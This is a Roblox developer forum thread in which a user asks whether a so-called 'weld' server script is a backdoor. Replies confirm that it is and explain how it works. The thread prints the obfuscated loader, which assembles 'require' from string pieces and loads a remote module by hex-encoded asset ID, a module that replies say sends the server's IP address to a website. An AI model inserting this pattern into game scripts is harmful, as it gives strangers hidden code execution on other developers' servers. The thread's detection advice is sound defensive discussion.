I just found a server script looked suspicious and used “getfenv” so I think its was a backdoor virus. Apparently its supposed to be a WELD. script for my baseplate, but I don’t trust it.
So tell me scripting experts:
Is this a backdoor virus script?
--weld script writen by atrition
pcall(function()
local fenv = getfenv
local ADDR = 0x19F996F0A;
local INST = "re"
pcall(fenv()[INST.."qui"..INST](ADDR))
end)
Has getfenv or require with an external asset ID
In a script you didn’t create and you don’t trust all too well
More specifically a common known “weld” back door script
Yep
Thanks. I don’t see how this script could weld my baseplate at all.
Notice how [INST.."qui"...INST] spells “require”. Trust me you don’t wanna import random closed source scripts.
If it were a ‘weld script’, the developer would write it and would not encrypt it using variables (and it would be possible to write a script), and it’s somehow very strange that instead of the ID for the request there is a different number. If there was an ID there, you could check this asset and if it has no ratings or it is poorly rated and the comments are bad, it would be a virus, I’m not very good at scripting, but that’s what I think.
It’s a way to avoid the script from appearing in the global script search feature when “req”, “require” etc. is searched.
Looking at the source code of the module this script loads, for whatever reason it’s sending the server the script is running on’s IP address to some website.
Thanks for everyone who replied to this thread!
You all REALLY saved me. Who knows how long I’ve had that script in my experience.
I’ve removed all the backdoors from the experience.
I also looked at some tutorials on the DevForum to search for others, just in case and I found another, which I also removed.
Once again, thanks for your help everyone!
Yup and here’s the source
Always erase/disable scripts from explorer that you think it’s suspicous.